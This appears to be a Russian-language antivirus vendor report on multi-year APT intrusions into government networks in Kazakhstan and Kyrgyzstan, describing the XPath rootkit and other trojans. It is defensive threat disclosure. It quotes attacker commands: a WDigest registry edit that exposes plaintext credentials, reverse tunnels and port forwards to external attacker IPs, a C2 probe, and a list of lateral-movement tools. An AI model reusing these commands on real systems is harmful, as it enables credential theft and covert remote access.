20 июля 2020 года

Введение

Как объект изучения целевые кибератаки на крупные предприятия и государственные учреждения представляют большой интерес для специалистов по информационной безопасности. Исследование таких инцидентов позволяет проанализировать стратегию и инструменты, используемые злоумышленниками для взлома компьютерных систем, и выработать соответствующие меры противодействия. Программное обеспечение, задействованное в таргетированных атаках, как правило является уникальным, так как разрабатывается в соответствии с целями и задачами нападавших, и не афишируется публично. По сравнению с массовыми угрозами образцы такого ПО редко попадают «на стол» к исследователям. Кроме того, при проведении целевых атак используются комплексные механизмы сокрытия следов вредоносной активности, что усложняет обнаружение постороннего присутствия внутри инфраструктуры атакованной организации.

В марте 2019 года в компанию «Доктор Веб» обратился клиент из государственного учреждения Республики Казахстан по вопросу наличия вредоносного ПО на одном из компьютеров корпоративной сети. Это обращение послужило поводом к началу расследования, по результатам которого специалисты нашей компании обнаружили и впервые описали группу троянских программ, использующихся для полномасштабной целевой атаки на учреждение. Имеющиеся в нашем распоряжении материалы позволили получить представление об инструментах и целях злоумышленников, проникших во внутреннюю компьютерную сеть. В ходе расследования было установлено, что сетевая инфраструктура учреждения была скомпрометирована как минимум с декабря 2017 года.

Кроме того, в феврале 2020 года в компанию «Доктор Веб» обратились представители государственного учреждения Киргизской Республики с признаками заражения корпоративной сети. Наша экспертиза установила наличие в сети ряда вредоносных программ, некоторые модификации которых также использовались в атаке на организацию в Казахстане. Анализ показал, что, как и в предыдущем случае, заражение началось задолго до обращения — в марте 2017 года.

Учитывая, что несанкционированное присутствие в обеих инфраструктурах продолжалось на протяжении как минимум трех лет, а также то, что при изучении отчетов с серверов были выявлены совершенно разные семейства троянских программ, мы допускаем, что за этими атаками могут стоять сразу несколько хакерских групп. При этом некоторые из использованных троянов хорошо известны: часть из них является эксклюзивными инструментами известных APT-групп, другая часть — используется различными APT-группами Китая.

Общие сведения об атаке и используемые инструменты

Нам удалось подробно изучить информацию с нескольких внутрисетевых серверов, принадлежащих пострадавшим учреждениям Казахстана и Киргизии. Все рассматриваемые в исследовании устройства работают под управлением операционных систем Microsoft Windows.

Вредоносные программы, которые применялись в таргетированной атаке, можно условно разделить на две категории:

• массовые, которые ставили на большинство компьютеров сети;
• специализированные, которые ставили на серверы, представляющие особый интерес для атакующего.

Изученные образцы вредоносных программ и используемые злоумышленниками утилиты позволяют предполагать следующий сценарий атаки. После успешного эксплуатирования уязвимостей и получения доступа к компьютеру сети злоумышленники загружали на него одну из модификаций трояна семейства BackDoor.PlugX. Модули полезной нагрузки трояна позволяли удаленно управлять инфицированным компьютером и использовать его для дальнейшего продвижения по сети. Другим трояном, предположительно использующимся для первичного заражения, был BackDoor.Whitebird.1. Бэкдор предназначался для 64-разрядных операционных систем и имел достаточно универсальную функциональность: поддержку зашифрованного соединения с управляющим сервером, а также функции файлового менеджера, прокси и удаленного управления через командную оболочку.

После установления присутствия в сети хакерская группа использовала специализированное вредоносное ПО для решения поставленных задач. Распределение специализированных троянских программ по инфицированным устройствам представлено ниже.

Контроллер домена #1:

Trojan.Misics
Trojan.XPath

Контроллер домена #2:

Trojan.Misics
Trojan.Mirage

Контроллер домена #3:

BackDoor.Mikroceen
BackDoor.Logtu

Сервер #1:

BackDoor.Mikroceen

Сервер #2:

Trojan.Mirage
BackDoor.CmdUdp.1

Из указанных троянов особого внимания заслуживает семейство XPath, представители которого, по нашей информации, ранее публично описаны не были. Семейство обладает руткитом для сокрытия сетевой активности и следов присутствия в скомпрометированной системе, обнаружить который удалось при помощи антируткита Dr.Web, установленного на атакованном сервере. Изученные нами образцы были скомпилированы в 2017-2018 годах. При этом в основе этих программ лежат проекты с открытым исходных кодом, вышедшие на несколько лет раньше. Так, в исследованных образцах использовались версии пакета WinDivert 2013-2015 годов. Это косвенно указывает на то, что первые модификации XPath также могли быть разработаны в этот период.

XPath является модульным трояном, каждый компонент которого соответствует определенной стадии работы вредоносной программы. Процесс заражения начинается с работы установщика компонентов, детектируемого как Trojan.XPath.1. Установщик использует зашитую в его теле зашифрованную конфигурацию и запускает полезную нагрузку либо путем установки драйвера, либо методом COM Hijacking. Программа использует системный реестр для хранения своих модулей, при этом используется как шифрование, так и сжатие данных.

Trojan.XPath.2 является драйвером и служит для сокрытия присутствия вредоносной активности в скомпрометированной системе, параллельно запуская другой модуль. Драйвер имеет китайские цифровые подписи, а его работа основана на проектах с открытым исходным кодом. В отличие от других компонентов, хранимых в системном реестре, файлы драйвера располагаются на диске, при этом программа работает скрытно. Помимо сокрытия файла драйвера на диске в задачи компонента входит внедрение загрузчика полезной нагрузки в процесс lsass.exe, а также маскировка сетевой активности трояна. Сценарий работы меняется в зависимости от версии операционной системы.

Оригинальное название третьего компонента — PayloadDll.c. Библиотека, детектируемая как Trojan.XPath.3, является промежуточным модулем и служит для внедрения в процесс svhost.exe полезной нагрузки, которая сохранена в реестре, методом COM Hijacking.

Основная функциональность содержится в модуле полезной нагрузки, детектируемом как Trojan.XPath.4. Компонент написан на C++, и в его основе также лежат проекты с открытым исходным кодом. Как и большинство рассмотренных в исследовании вредоносных программ, этот троян предназначен для получения несанкционированного доступа к зараженным компьютерам и кражи конфиденциальных данных. Его особенностью является способность функционировать в двух режимах. Первый — работа в режиме клиента (Client Mode). В этом режиме троян соединяется с управляющим сервером и ожидает входящие команды. Второй — работа в режиме агента (Agent Mode). В этом режиме Trojan.XPath.4 выполняет функции сервера: он прослушивает определенные порты, ожидая подключения к ним других клиентов и отправляя им команды. Таким образом, разработчики предусмотрели сценарий развертывания локального управляющего сервера внутри атакуемой сети для перенаправления команд от внешнего управляющего сервера зараженным компьютерам внутри сети.

Подробное описание работы программ семейства XPath находится в PDF-версии исследования, а также доступно в вирусной библиотеке Dr.Web.

Среди других интересных находок — особенность реализации доступа к командной оболочке трояна Mirage. Для перенаправления ввода-вывода командной оболочки вредоносная программа использовала файлы, которые мы смогли получить с зараженного сервера. Таким образом удалось увидеть команды, выполнявшиеся злоумышленниками с помощью представленной функции трояна, а также полученные в ответ данные:

reg add HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\Wdigest /v UseLogonCredential /t REG_DWORD /d 1 /f
ipconfig /displaydns
c:\windows\debug\windbg.exe -n 202.74.232.2 -o 53,80,443
c:\windows\debug\windbg.exe -n 202.74.232.2 -o 143,110
reg query HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\Wdigest

Запускавшийся windbg.exe файл представлял собой сканер TCP/UPD-портов PortQry.

В ходе расследования мы обнаружили свидетельства, косвенно подтверждающие связь таргетированных атак на учреждения государств Центральной Азии. Так, один из найденных образцов BackDoor.PlugX.38 использовал в качестве управляющего сервера домен nicodonald[.]accesscam[.]org, который использовался и в качестве управляющего сервера для BackDoor.Apper.14, также известного под названием ICEFOG NG. Несколько лет назад бэкдор этого семейства был обнаружен нами в фишинговом письме, направленном в одно из государственных учреждений Казахстана. Кроме того, RTF-документ, устанавливающий этот образец BackDoor.Apper.14, впервые был загружен на VirusTotal из Казахстана 19 марта 2019 года.

Интересной находкой в рамках инцидента в Киргизии стал бэкдор Logtu, обнаруженный на зараженном сервере вместе с Mikroceen. Помимо похожего набора вредоносного ПО, использующегося злоумышленниками, именно Mikroceen позволяет говорить о возможной связи двух атак: образец этого узкоспециализированного бэкдора был найден в обеих сетях и в обоих случаях устанавливался на контроллер домена.

В ходе поиска образцов, имеющих отношение к данным атакам, был найден специально подготовленный бэкдор, реализующий BIND Shell-доступ к командной оболочке. Путь до отладочных символов содержит название проекта на китайском языке — 正向马源码, что может указывать на соответствующее происхождение трояна.

Помимо вредоносного ПО для дальнейшего продвижения по сети злоумышленники использовали следующие публично доступные утилиты:

• Mimikatz
• TCP Port Scanner V1.2 By WinEggDrop
• Nbtscan
• PsExec
• wmiexec.vbs
• goMS17-010
• ZXPortMap v1.0 By LZX
• Earthworm
• PortQry version 2.0 GOLD

Ниже представлены примеры запуска некоторых из перечисленных утилит.

• ZXPortMap: vmwared.exe 21 46.105.227.110 53
• Earthworm: cryptsocket.exe -s rssocks -d 137.175.79.212 -e 53

APT-группа также активно использовала собственные PowerShell-скрипы для сбора информации об инфицированном компьютере, других устройствах сети, проверки управляющих серверов с зараженного компьютера и подобных задач. Кроме того, мы нашли PowerShell-скрипт, предназначенный для выгрузки из Microsoft Exchange Server всего содержимого почтовых ящиков нескольких сотрудников организации.

Примеры некоторых PowerShell-скриптов, выполненных на зараженных серверах:

%COMSPEC% /Q /c tasklist /v >>c:\programdata\2.txt
%COMSPEC% /Q /c systeminfo >>c:\programdata\2.txt
%COMSPEC% /Q /c netstat -nvb    >> c:\programdata\2.txt
powershell -exec bypass -command "& {  foreach($i in 53,80,443){ echo ((new-object Net.Sockets.TcpClient).Connect('v.nnncity.xyz',$i))  "port:"$i } 2 > $null  }" >>c:\programdata\2.txt

Заключение

В ходе расследования нашим специалистам удалось найти сразу несколько семейств троянских программ, используемых в этих атаках. Анализ образцов и вредоносной активности показал, что взлом сетевой инфраструктуры произошел задолго до обнаружения первых признаков заражения сотрудниками организации. К сожалению, такой сценарий — один из атрибутов успешных APT-атак, так как значительные ресурсы вирусописателей всегда направлены на сокрытие своего присутствия в системе.

За скобками исследования остался первичный вектор заражения, а также общая картина заражения всей инфраструктуры. Мы уверены, что описанные в исследовании трояны — лишь часть вредоносного ПО, задействованного в этих атаках. Механизмы, используемые хакерами, многократно затрудняют не только обнаружение несанкционированного вторжения, но и возврат контроля над сетевыми объектами.

Для минимизации рисков необходим постоянный мониторинг внутрисетевых ресурсов, в особенности тех серверов, которые представляют повышенный интерес для злоумышленников, — контроллеры домена, почтовые сервера, интернет-шлюзы. В случае компрометации системы необходим оперативный и правильный анализ ситуации для разработки адекватных мер противодействия. «Доктор Веб» не только создает средства антивирусной защиты, но и оказывает услуги по расследованию вирусозависимых компьютерных инцидентов, к числу которых относятся и целевые атаки. При подозрении на вредоносную активность в корпоративной сети следует обращаться за квалифицированной помощью в вирусную лабораторию «Доктор Веб». Своевременное реагирование позволит минимизировать ущерб и предотвратить тяжелейшие последствия, которые влекут за собой таргетированные компьютерные атаки.

Индикаторы компрометации.